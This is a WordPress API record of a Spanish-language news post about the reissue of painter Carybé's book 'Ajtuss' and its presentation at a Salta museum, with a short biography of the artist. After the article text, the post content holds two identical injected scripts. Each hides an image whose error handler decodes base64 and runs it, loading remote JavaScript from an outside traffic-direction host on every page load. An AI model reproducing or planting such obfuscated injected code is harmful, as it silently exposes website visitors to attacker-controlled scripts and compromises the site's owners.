{"id":4261,"date":"2024-08-06T10:55:16","date_gmt":"2024-08-06T13:55:16","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4261"},"modified":"2025-08-13T23:51:27","modified_gmt":"2025-08-14T02:51:27","slug":"se-presenta-hoy-en-salta-el-libro-del-gran-pintor-carybe","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4261","title":{"rendered":"Se presenta hoy en Salta el libro del gran pintor Caryb\u00e9"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-9adbc68a5761883da4ae0f16c675bf62\" style=\"background-color:#7f0423\"><em>Esta tarde a las 18 horas, tendr\u00e1 lugar en el Museo Provincial de Bellas Artes Lola Mora, ubicado en Belgrano 992. La obra \u201cAjtuss\u201d, fue reeditada por la Secretar\u00eda de Cultura de la Provincia, despu\u00e9s de 60 a\u00f1os de su publicaci\u00f3n original en Buenos Aires.<\/em><\/h3>\n\n\n\n<p>Hoy&nbsp;martes 6 de agosto, a las 18 hs, en el Museo Provincial de Bellas Artes Lola Mora, se presentar\u00e1 \u00abAjtuss\u00bb, el libro del renombrado pintor argentino-brasile\u00f1o Caryb\u00e9. La obra, reeditada tras 60 a\u00f1os, incluye dibujos y relatos del artista que capturan la esencia de sus viajes por Latinoam\u00e9rica. &nbsp;&nbsp;<\/p>\n\n\n\n<p>Este volumen incluye una serie de magn\u00edficos dibujos de Caryb\u00e9 que capturan escenas y el esp\u00edritu de los mundos que descubri\u00f3 en sus viajes por Latinoam\u00e9rica, acompa\u00f1ados de un relato en prosa de impecable y original factura. El libro cuenta con un pr\u00f3logo del c\u00e9lebre poeta brasile\u00f1o Newton Freitas y un impecable dise\u00f1o a cargo de Gabriel Bernab\u00f3, nieto de Caryb\u00e9. Con esta publicaci\u00f3n, Caryb\u00e9 regresa a Salta, ciudad en la que vivi\u00f3 y en cuya cultura dej\u00f3 una notoria y decidida influencia. La presentaci\u00f3n de \u00abAjtuss\u00bb estar\u00e1 a cargo del poeta Leopoldo Castilla.<\/p>\n\n\n\n<p><strong>Sobre Caryb\u00e9<\/strong><\/p>\n\n\n\n<p>Nacido en 1912 en Lan\u00fas, Buenos Aires, H\u00e9ctor Parides Bernab\u00f3, m\u00e1s conocido como Caryb\u00e9, fue un artista reconocido y celebrado mundialmente. Su relaci\u00f3n con Salta comenz\u00f3 en 1941, cuando lleg\u00f3 a la provincia y entabl\u00f3 amistad con poetas, m\u00fasicos y artistas pl\u00e1sticos locales. En Salta conoci\u00f3 a Nancy Colina, quien ser\u00eda su compa\u00f1era de toda la vida.<\/p>\n\n\n\n<p>La llegada de Caryb\u00e9, junto a la de otros grandes artistas como la pintora austr\u00edaca Gertrudis Chale, Luis Preti y Ra\u00fal Bri\u00e9, marc\u00f3 un cambio radical en las tendencias est\u00e9ticas del pa\u00eds, que hasta entonces se basaban en corrientes europeas, al enfocar su atenci\u00f3n en Latinoam\u00e9rica y su rica y desconocida cosmogon\u00eda.<\/p>\n\n\n\n<p>De la confluencia de estos talentos, junto con los creadores salte\u00f1os, surgi\u00f3 desde el norte del pa\u00eds un movimiento de afirmaci\u00f3n e identidad cultural americana de vigorosa y a\u00fan vigente proyecci\u00f3n. Pocos a\u00f1os despu\u00e9s, Caryb\u00e9 se estableci\u00f3 en San Salvador de Bah\u00eda, Brasil, ciudad que lo adopt\u00f3 y reconoci\u00f3 como uno de los fundadores de su proyecci\u00f3n m\u00edtica en el mundo, junto al escritor Jorge Amado.<\/p>\n\n\n\n<p>Desde Bah\u00eda, Caryb\u00e9 desarroll\u00f3 una obra valorada en distintos pa\u00edses. Por ejemplo, pint\u00f3 un mural en el Aeropuerto John F. Kennedy de Nueva York y algunas de sus pinturas forman parte de la colecci\u00f3n privada de la Reina de Inglaterra.<\/p>\n\n\n\n<p>La proximidad de esta presentaci\u00f3n con la Feria de Arte de Salta sugiere una alta concurrencia de amantes del arte y la cultura de la ciudad.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Esta tarde a las 18 horas, tendr\u00e1 lugar en el Museo Provincial de Bellas Artes Lola Mora, ubicado en Belgrano 992. La obra \u201cAjtuss\u201d, fue reeditada por la Secretar\u00eda de Cultura de la Provincia, despu\u00e9s de 60 a\u00f1os de su publicaci\u00f3n original en Buenos Aires. Hoy&nbsp;martes 6 de agosto, a las 18 hs, en el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4262,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9],"tags":[],"class_list":{"0":"post-4261","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4261"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4261"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4261\/revisions"}],"predecessor-version":[{"id":6722,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4261\/revisions\/6722"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4262"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4261"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4261"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}